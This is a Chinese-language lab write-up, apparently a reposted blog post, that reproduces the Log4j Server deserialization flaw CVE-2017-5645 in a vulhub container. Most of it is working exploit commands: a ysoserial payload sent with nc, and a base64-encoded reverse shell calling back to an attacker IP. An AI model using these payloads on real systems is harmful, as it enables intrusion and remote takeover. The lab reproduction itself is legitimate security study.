Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)复现

漏洞概述

 

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码。

 

环境搭建

 

这里使用vulhub来搭建环境

https://github.com/vulhub/vulhub/tree/master/log4j/CVE-2017-5645
进入目录并启动环境

cd vulhub-master/log4j/CVE-2017-5645/

docker-compose up -d

环境启动后,将在4712端口开启一个TCPServer。

 

漏洞复现

 

我们使用ysoserial生成payload,然后直接发送给your-ip:4712端口即可。

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/success" | nc 192.168.204.138 4712

进入容器

docker exec -it 69272f8d8ae8 /bin/bash

执行了命令

再试试反弹shell

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwNC4xMzgvNjY2NiAwPiYx}|{base64,-d}|{bash,-i}" | nc 192.168.204.138 4712 

修复建议

 

升级到安全版本

 

猜你喜欢

转载自blog.csdn.net/xuandao_ahfengren/article/details/113351054